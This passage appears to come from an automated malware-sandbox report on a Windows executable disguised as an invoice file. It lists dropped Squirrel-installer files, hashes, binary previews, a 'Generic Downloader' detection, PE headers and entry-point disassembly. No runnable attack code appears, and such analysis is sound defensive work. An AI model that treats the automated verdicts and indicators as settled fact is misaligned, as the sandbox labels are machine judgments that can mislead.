                                                                            SHA-256:B3F058CCB0C2ED25372204A558005422B780BF487FA5E2A0E2C1CC24C3B5D177
                                                                            SHA-512:EA44D50A83B43CE064B69A83272C7AC161FE6F62C620CCC360C1C4B98A2723BE931D687D118B0EB4D4091178F1D8668FAF768DB516C139953D21F39259E0E65E
                                                                            Malicious:false
                                                                            Preview:.9D66ACA98B9CF2BEA1F098ADD4AE3E4098DCFC7B Extra-1.0.0-full.nupkg 29633574
                                                                            Process:C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe
                                                                            File Type:CSV text
                                                                            Category:modified
                                                                            Size (bytes):1281
                                                                            Entropy (8bit):5.370111951859942
                                                                            Encrypted:false
                                                                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                            MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                            Malicious:false
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2751
                                                                            Entropy (8bit):5.372322730968244
                                                                            Encrypted:false
                                                                            SSDEEP:48:MxHKQwYHKGSI6ouHlJH/lEHuFKHKS+AHKKk7O6HFHKp1qHGIsCtHTHNHkbEHKxHO:iqbYqGSI6ou/fmOYqSJqKk7jlqpwmjCX
                                                                            MD5:E186D8CCFA77C108F5C38908EF87820C
                                                                            SHA1:47495A5AE5BE859D96CD2C2BD276A4B9A8B441C0
                                                                            SHA-256:E2CDF4184CFAFC04DCEB16A3AB1826DBB566B677590B5852A74411BA8B308142
                                                                            SHA-512:4173349453148C359F9E0DD698D7C8142A3198BD327722A3D5D5BD1C19F9695EFE732DB3769FB938FF3705AA3CC35A90EDFF2B2ED6F08F2901E376C6A3A1EE5E
                                                                            Malicious:false
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\WindowsBase\95a5c1baa004b986366d34856f0a5a75\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\ef4e808cb158d79ab9a2b049f8fab733\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):8773630
                                                                            Entropy (8bit):7.99997781368023
                                                                            Encrypted:true
                                                                            SSDEEP:196608:He+u4ln80jwTABJKUiD2iS1+sGRVc3PC3s3Z6owng4gB6nho8V9TT:HeZ4N80jwG3W2xR2YP6Meg4gBf8H
                                                                            MD5:51B2093E0B5ED5E5222783D1E118F078
                                                                            SHA1:D698D261CA3B18EE7A6395D4BFF47E7A9D8CCE4D
                                                                            SHA-256:2E5BE87C36974215CAFF5C0C47F862F4DC346AAE3B241120E60BB93ECC5DED7A
                                                                            SHA-512:12542523189F108CE20785ADADE42DFAF59105B6A247AF82FE7F4DA783F457F762BFF9B67862AA258C29867F8E78591DBD05E53A796308199A314ADD5830DA08
                                                                            Malicious:false
                                                                            Preview:H~.Ea..kyJ._.....@....<.=..}.]..A.).W.....".gb...s...lR..4p..ekJ.......n...q.~.P......(J!...v.Ma>.<.+(.r.>...F..g8..k e...Rb..S....w...^.,.`...T.9`zC...?.37..._.Y&!..L.I..H.q..3{S.H........D.v1k.[.^n..-.....J....W.c.#y.G,.U....(V..e..EM...-!f...\.}..}.[.."......z...B.q..'c".o......._...T....~.....D.d......J......9w..b.Kik..H..fSQ........&.`.'.......92:....i...~...^...Q.mQ.;pt...."....r]..).mv...q3....H.I./.v..G.....e.4.z"...UsSn...D...I....S.A:.....|.x...*).b..7){.i0.L.r}V6.....3...._.8..XY~.;..~%....:uc.y".7...%.ip..p.....Li..wh...j._..R:.....4..9......`.._.`....PYC..k1....._$..(a..N..A...\..<./.....E..-...dM........i..y..G3!....0q..C*.cm.R&W?.E@.........V..79.Mf........@.G......"#.....$.......g.b.8...tYQZ...d...~>.?.4.v.O........%.?l...R*.!.\....N..`..(..M....h.7TcQ..1.?`.3.|..sX(;....y`..cd..K.....B..|...X.8.......6q.`.....J...2P./G.<...^}....S.'.......J#.....q.k]Zg%..+.@.'[...cE7....g......2w<.J....1s]##....n..!.U..#.. ..6"
                                                                            Process:C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                            Category:dropped
                                                                            Size (bytes):29633574
                                                                            Entropy (8bit):7.999993888900749
                                                                            Encrypted:true
                                                                            SSDEEP:786432:G4Qt269TaEKww6K57xSukh8+CHwsotYrn:G4Ql9DKwoxNkEwsotYrn
                                                                            MD5:50212CBB0F92B6E321CFB929AA665B1E
                                                                            SHA1:9D66ACA98B9CF2BEA1F098ADD4AE3E4098DCFC7B
                                                                            SHA-256:57C498CAD1C976690EC840CF581D5F5D2AD4D514009224A538C796FE457965B7
                                                                            SHA-512:97AFB6F8EB2E94E971F2DFBCBCDDB5CC2053AA27C3729C0753F45FC50B3233A73B81E0D9A4E6428EF6825A2B6C70AB7C477A5828FD2996BE9E31084FE3D452CD
                                                                            Malicious:false
                                                                            Preview:PK........M.=X.I;.............Extra.nuspecu._J.0.......n.[AD.,".y..N.`..d..#y.../.......6....|L.?>.v..{..w-.T5g...Z>S.u...B....,.]j.H......TY..O..J{..o..M.i...7...ZR..2.ER."......E% WkoM%s....bQ..eh.EQ3.>...XT..../F|.M.'..%....).Q.jJ(..^.;L:.@9gy..U\i.V..1.?.>..F...b_.5us-....'.......PK........M.=X................lib/PK........M.=X................lib/net48/PK........M.=X...~............lib/net48/diskres.dllc.P...du....pKA....h..9......a...O.Z.%`..a*r<...L..E.?f-..b..C.R..Rn..2....+..f..N....Avh..w..0.Q3t...D.P.......9/.;.(.t..=.O.0..y.k..b@Df`..;..EAA?.+./i..C.mI...D....vNa...Xi.(.Vj...S...a.0h.].d...I.&..r.....N...2.....g.md..tBL{L.?....s..:i'Q3lk<..4BE.D!.I..g....9l.Ih..OU...k^....Z..Vb.#......t<...'...@a.X.....K.g.k....'.'.sw'.U...:Yt..^a(%.`..W-..[......o..D.)z_w....\..F..P.O.t...e.>.g...H(. C...2.m.fm...P8.<.Xf..E....V..........p+.r..9.Bi...C..!..d...z.yN;.U.q.m".ZM...u.2 W(....V.....D"....y..w...R?.)j..b|..G.-HJ..\.......,.nG.f..;.z.3...-.L..
                                                                            Process:C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):75
                                                                            Entropy (8bit):4.810103650577109
                                                                            Encrypted:false
                                                                            SSDEEP:3:7om3ncIh6Vcmys3jlnF9fJxrGo:fMIh+cTsTlnDjGo
                                                                            MD5:24A3B66227DEF1B92C422BAA7C77D48E
                                                                            SHA1:0AB2FE17497F76458D312A25A614F7A83D77DB43
                                                                            SHA-256:B3F058CCB0C2ED25372204A558005422B780BF487FA5E2A0E2C1CC24C3B5D177
                                                                            SHA-512:EA44D50A83B43CE064B69A83272C7AC161FE6F62C620CCC360C1C4B98A2723BE931D687D118B0EB4D4091178F1D8668FAF768DB516C139953D21F39259E0E65E
                                                                            Malicious:false
                                                                            Preview:.9D66ACA98B9CF2BEA1F098ADD4AE3E4098DCFC7B Extra-1.0.0-full.nupkg 29633574
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2353
                                                                            Entropy (8bit):5.310671120703352
                                                                            Encrypted:false
                                                                            SSDEEP:48:7/tHXNQ19MPxQViPGmQPYXbJ2MQVfu397u3WQRMQVQZ6m799/9WQRMQVQZ6mNRnD:7lTGiI8bTqz
                                                                            MD5:C077013A6051127E99AF8E8256EA9CDE
                                                                            SHA1:22D296F2B905391FE8CDA52EB2AFEF9A1838A737
                                                                            SHA-256:CF9B45AE216499BC35BAAA71AEC313790C184A4326DA5D33E00331F7D99A9F6D
                                                                            SHA-512:BB79697AEBF0C796EA4F7A1147207A2AEFFEF87E9A8A5B6A61A007A7CF61F664748FFB6B5FB0EFF73A822BBCEA725184384BB74B5774DB3EEE043EF2FD75E71E
                                                                            Malicious:false
                                                                            Preview:.[30/01/24 13:32:23] info: Program: Starting Squirrel Updater: --install . --rerunningWithoutUAC..[30/01/24 13:32:23] info: Program: Starting install, writing to C:\Users\user\AppData\Local\SquirrelTemp..[30/01/24 13:32:23] info: Program: About to install to: C:\Users\user\AppData\Local\Extra..[30/01/24 13:32:23] info: CheckForUpdateImpl: Reading RELEASES file from C:\Users\user\AppData\Local\SquirrelTemp..[30/01/24 13:32:23] info: CheckForUpdateImpl: First run, starting from scratch..[30/01/24 13:32:24] info: ApplyReleasesImpl: Writing files to app directory: C:\Users\user\AppData\Local\Extra\app-1.0.0..[30/01/24 13:32:25] info: LogHost: Rigging execution stub for Stand_ExecutionStub.exe to C:\Users\user\AppData\Local\Extra\Stand.exe..[30/01/24 13:32:25] info: ApplyReleasesImpl: Squirrel Enabled Apps: []..[30/01/24 13:32:25] warn: ApplyReleasesImpl: No apps are marked as Squirrel-aware! Going to run them all..[30/01/24 13:32:25] info: ApplyReleasesImpl: About to create shortcut
                                                                            Process:C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1899520
                                                                            Entropy (8bit):5.894883178349122
                                                                            Encrypted:false
                                                                            SSDEEP:24576:pWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2:0t3UCiag6CKM2zCyZuOjJaxSS5qh
                                                                            MD5:A560BAD9E373EA5223792D60BEDE2B13
                                                                            SHA1:82A0DA9B52741D8994F28AD9ED6CBD3E6D3538FA
                                                                            SHA-256:76359CD4B0349A83337B941332AD042C90351C2BB0A4628307740324C97984CC
                                                                            SHA-512:58A1B4E1580273E1E5021DD2309B1841767D2A4BE76AB4A7D4FF11B53FA9DE068F6DA67BF0DCCFB19B4C91351387C0E6E200A2A864EC3FA737A1CB0970C8242C
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Author: Joe Security
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.p_............................>.... ........@.. .......................`............@.....................................W.... .......................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H.......LU..............,.................................................{....*..{....*..{....*r.(......}......}......}....*....0..S........u......,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o....*.*..0..K....... .A. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o....X*..0...........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*....{....*..{....*
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:ISO-8859 text, with CR line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4
                                                                            Entropy (8bit):2.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:9:9
                                                                            MD5:A7E0F8AC46398A7876D1E40DD52C2AAB
                                                                            SHA1:B66922B4E6F09E23C072E4AFF49C67C3121DD5AF
                                                                            SHA-256:05174BBF0D407087E45B12BAAE17117426852FF3A9E58D12A0EBB9A10B409743
                                                                            SHA-512:E6B93215582F7F4F5E9292273A9466B5D0CC3A4EA7D77AE42854203755441DD5EDBEFB11FE8890CAE7783E41E2EDBF61EC7B03D7E5E9870A7821D4016B095F79
                                                                            Malicious:false
                                                                            Preview:....
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):142
                                                                            Entropy (8bit):6.55447018279355
                                                                            Encrypted:false
                                                                            SSDEEP:3:DfVjzD2ZzXgE4dXC/FiYvyfgaPDlZqLDpVYngGbu/6Ry0s9rYdn:hnDEgRdSZEg8YDp1ERy0OAn
                                                                            MD5:57A37BD0840D0745A9481BCC25B5A792
                                                                            SHA1:E8B7C744981C0713DE5EBB308897EFCBD374FD11
                                                                            SHA-256:E2B2371F95D8D9CBFCA301AFF3441466E30453BBD37A42FA17DAF4D85AA7E627
                                                                            SHA-512:08AFA751874B49FB20ADBEC0C824609DAE0DECD6E747471EF8CB19FAE299A65D21ACC02185560669ED9E36CD74E2E4372B61E52EEF34D5785E9BBA3DC8FD431B
                                                                            Malicious:false
                                                                            Preview:H~.E.L......z.'.<.Er...a..]...`rf1_B..U.~.e)?...Ri..{.. X..ykq...&..(...Ri..G..08..<.Er...X}_.....V ....j..PK.o..'a#-.=D4...d......&.
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Tue Jan 30 11:32:25 2024, mtime=Tue Jan 30 11:32:25 2024, atime=Tue Jan 30 11:32:25 2024, length=195072, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):2151
                                                                            Entropy (8bit):3.6747062146591913
                                                                            Encrypted:false
                                                                            SSDEEP:24:8IfJj7aRRQMRAFfQgiqc9qR9qCO4ZQgOqqe3gP7lqy1Efdqm:8IfJjKRQMiFQ7L9C9VZQhqyPQy1Efg
                                                                            MD5:8601498AE7CEEAE12335432EE044C753
                                                                            SHA1:AA69DFCB1C830304495D006F9DF7C594A98CF3FE
                                                                            SHA-256:83829B7937AD4B470373B0E9CF75B950CC6E74A3D7757456E1566DCCBFD8CC07
                                                                            SHA-512:E850630CF00E2BA7BFBC37BCF3AE5BC0E018FA513744AB20E5121825AAFBA86D3FE7BDDCE0DD6D2EA2F0B365ACA6862EB73C2EA0752CBD66E11E659A9256B1F6
                                                                            Malicious:false
                                                                            Preview:L..................F.@.. .....(axS...A+axS...A+axS............................:..DG..Yr?.D..U..k0.&...&......vk.v......DZxS...=.axS......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^>X.d...........................%..A.p.p.D.a.t.a...B.P.1.....>X.d..Local.<......CW.^>X.d....b.........................L.o.c.a.l.....P.1.....>X.d..Extra.<......>X.d>X.d..............................E.x.t.r.a.....\.2.....>X.d .Stand.exe.D......>X.d>X.d..........................N'v.S.t.a.n.d...e.x.e.......[...............-.......Z...........r:Z......C:\Users\user\AppData\Local\Extra\Stand.exe....E.x.t.r.a.'.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.E.x.t.r.a.\.S.t.a.n.d...e.x.e.,.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.E.x.t.r.a.\.a.p.p.-.1...0...0.,.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.E.x.t.r.a.\.S.t.a.n.d...e.x.e.........%USERPROFILE%\AppData\Local\Extra\Stand.exe..................................................................
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Tue Jan 30 11:32:25 2024, mtime=Tue Jan 30 11:32:26 2024, atime=Tue Jan 30 11:32:25 2024, length=195072, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):2137
                                                                            Entropy (8bit):3.673973824477649
                                                                            Encrypted:false
                                                                            SSDEEP:48:8ofJjJ1dRWMiFQtL9C9VZQhqyPQy1Efg:8Uj39Wyaf
                                                                            MD5:4117BD7FF3E34E1DF16B3ED553775808
                                                                            SHA1:9CA23735B565AAF9C513EE20184EBD824878D203
                                                                            SHA-256:2B18E23AE1D84B46133DAD0B6065B296819C1D69901A168C08DC8D57F02737FE
                                                                            SHA-512:0A3FE16D63A19762F49060E28F1A9D744E39589A49FA77DB9A6DB5A688012C22733C04BCD1E45D0D7AB0EAFD09D2ACC29464B9CA3F143DF45D25B8E22BE998D4
                                                                            Malicious:false
                                                                            Preview:L..................F.@.. .....(axS.....axS...A+axS............................:..DG..Yr?.D..U..k0.&...&......vk.v......DZxS...=.axS......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^>X.d...........................%..A.p.p.D.a.t.a...B.P.1.....>X.d..Local.<......CW.^>X.d....b.....................W.D.L.o.c.a.l.....P.1.....>X.d..Extra.<......>X.d>X.d...........................x.E.x.t.r.a.....\.2.....>X.d .Stand.exe.D......>X.d>X.d..........................N'v.S.t.a.n.d...e.x.e.......[...............-.......Z...........r:Z......C:\Users\user\AppData\Local\Extra\Stand.exe....E.x.t.r.a. .....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.E.x.t.r.a.\.S.t.a.n.d...e.x.e.,.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.E.x.t.r.a.\.a.p.p.-.1...0...0.,.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.E.x.t.r.a.\.S.t.a.n.d...e.x.e.........%USERPROFILE%\AppData\Local\Extra\Stand.exe................................................................................
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):55
                                                                            Entropy (8bit):4.306461250274409
                                                                            Encrypted:false
                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                            Malicious:false
                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.999657674325429
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
                                                                            File size:30'540'800 bytes
                                                                            MD5:511fdcc7fc2f4220353004cfb011f522
                                                                            SHA1:93ef93aa71476734b1598037838cc6b9fc8b47f7
                                                                            SHA256:b457a493fad9212b369552df689d67b5e1feec656451cf586abcc5411cee6e00
                                                                            SHA512:1ab6d38ab8e55b5b56675a85f1e8af25e9f405e2d00ef820ae67495a7311b4f0d4fa91cefb04cc34f2d5af481d00457e8b1024126e7fd98489caaa223d469b71
                                                                            SSDEEP:786432:iiYxcIt7okKo+IWpppwOg1ok6n4kCn8d:iiY7tpKocpXge4kCn8d
                                                                            TLSH:7267332253226636D3F28CB767B9177629377B284832EFAFD24417748E18073AF64761
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X........................y.......................................................a...T.......T.Z.......2.....T.......Rich...
                                                                            Icon Hash:13170f6d2d6d6d33
                                                                            Entrypoint:0x40ab5c
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x5F70D7D7 [Sun Sep 27 18:20:07 2020 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:6
                                                                            OS Version Minor:0
                                                                            File Version Major:6
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:6
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:e6f4169f2a5c3a8f93171d9f593bd22a
                                                                            Instruction
                                                                            call 00007FC720F36BCCh
                                                                            jmp 00007FC720F364EFh
                                                                            ret
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            push esi
                                                                            push dword ptr [ebp+08h]
                                                                            mov esi, ecx
                                                                            call 00007FC720F366CDh
                                                                            mov dword ptr [esi], 0041F45Ch
                                                                            mov eax, esi
                                                                            pop esi
                                                                            pop ebp
                                                                            retn 0004h
                                                                            and dword ptr [ecx+04h], 00000000h
                                                                            mov eax, ecx
                                                                            and dword ptr [ecx+08h], 00000000h
                                                                            mov dword ptr [ecx+04h], 0041F464h
                                                                            mov dword ptr [ecx], 0041F45Ch
                                                                            ret
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            push esi
                                                                            push dword ptr [ebp+08h]
                                                                            mov esi, ecx
                                                                            call 00007FC720F3669Ah
                                                                            mov dword ptr [esi], 0041F478h
                                                                            mov eax, esi
                                                                            pop esi
                                                                            pop ebp
                                                                            retn 0004h
                                                                            and dword ptr [ecx+04h], 00000000h
                                                                            mov eax, ecx
                                                                            and dword ptr [ecx+08h], 00000000h
                                                                            mov dword ptr [ecx+04h], 0041F480h
                                                                            mov dword ptr [ecx], 0041F478h
                                                                            ret
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            push esi
                                                                            mov esi, ecx
                                                                            lea eax, dword ptr [esi+04h]
                                                                            mov dword ptr [esi], 0041F43Ch
                                                                            and dword ptr [eax], 00000000h
                                                                            and dword ptr [eax+04h], 00000000h
                                                                            push eax
                                                                            mov eax, dword ptr [ebp+08h]
                                                                            add eax, 04h
                                                                            push eax
                                                                            call 00007FC720F37DDCh
                                                                            pop ecx
                                                                            pop ecx
                                                                            mov eax, esi
                                                                            pop esi
                                                                            pop ebp
                                                                            retn 0004h
                                                                            lea eax, dword ptr [ecx+04h]
                                                                            mov dword ptr [ecx], 0041F43Ch
                                                                            push eax
                                                                            call 00007FC720F37E27h
                                                                            pop ecx
                                                                            ret
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            push esi
                                                                            mov esi, ecx
                                                                            lea eax, dword ptr [esi+04h]
                                                                            mov dword ptr [esi], 0041F43Ch
                                                                            push eax
                                                                            call 00007FC720F37E10h
                                                                            test byte ptr [ebp+08h], 00000001h
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x2932c0x50.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x1cf5418.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d220000x190c.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x277200x70.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1f3980x40.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x1f0000x1a4.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x28ef00xe0.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x1d32b0x1d400723597f58d5674921108e642a8e1b5b4False0.5962540064102564data6.658318567238198IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x1f0000xacae0xae00fa1645fd03dda975b8bd67904b34af32False0.44526760057471265data4.948544868021258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x2a0000x18700xe00f8724007e5d2ce85c65b5408a736d005False0.21484375data3.016754020922221IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0x2c0000x1cf54180x1cf560008ef6b40a5f9f3088e2b01984dff3318unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x1d220000x190c0x1a00fca0dc86189b5b127d85095ebd6abd95False0.7630709134615384data6.514362877721557IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            DATA0x2c3400x1cf2764Zip archive data, at least v2.0 to extract, compression method=deflateEnglishUnited States1.0003108978271484
                                                                            FLAGS0x1d1eaa40xcdataEnglishUnited States1.6666666666666667
                                                                            RT_ICON0x1d1eab00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.21774193548387097
                                                                            RT_ICON0x1d1ed980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.11597472924187725
                                                                            RT_ICON0x1d1f6400x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.21774193548387097
                                                                            RT_ICON0x1d1f9280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.11597472924187725
                                                                            RT_STRING0x1d201d00x418dataEnglishUnited States0.3148854961832061
                                                                            RT_STRING0x1d205e80x604dataEnglishUnited States0.21363636363636362
                                                                            RT_STRING0x1d20bec0x152dataEnglishUnited States0.5591715976331361
                                                                            RT_GROUP_ICON0x1d20d400x22dataEnglishUnited States1.0588235294117647
                                                                            RT_GROUP_ICON0x1d20d640x22dataEnglishUnited States1.088235294117647
                                                                            RT_VERSION0x1d20d880x2a8dataEnglishUnited States0.4661764705882353
                                                                            RT_MANIFEST0x1d210300x3e7XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (939), with CRLF line terminatorsEnglishUnited States0.5145145145145145
                                                                            DLLImport
